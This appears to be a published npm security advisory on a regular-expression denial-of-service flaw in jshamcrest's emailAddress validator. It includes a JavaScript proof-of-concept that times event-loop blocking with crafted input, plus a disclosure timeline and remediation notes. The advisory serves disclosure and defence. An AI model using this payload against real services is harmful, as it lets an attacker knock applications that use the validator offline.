jshamcrest

Regular Expression Denial of Service

Severity: high

Overview

The jshamcrest package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.

Proof of concept

var js = require('jshamcrest')
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();


var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}


for (i=1;i<=10000000;i=i+1) {
    console.log("COUNT: " + i);
    var str = '[email protected]' + genstr(i, 'a') + '{'
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    emailAddress.matches(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results

It takes about 116 characters to get a 1.6 second event loop block.

[ 1, 633084590 ]
COUNT: 51
LENGTH: 116

Timeline

  • October 25, 2015 - Vulnerability Identified
  • October 25, 2015 - Maintainers notified (no response)

Remediation

The jshamcrest package currently has no patched versions available.

At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are multiple modules fitting this criteria available on npm..

Vulnerable versions

0.6.7
6 years ago
0.7.0
5 years ago
0.7.1
2 years ago

Unaffected versions

Advisory timeline

  1. Published

    Advisory published
    Jan 5th, 2016
  2. Reported

    Initial report by Adam Baldwin
    Oct 25th, 2015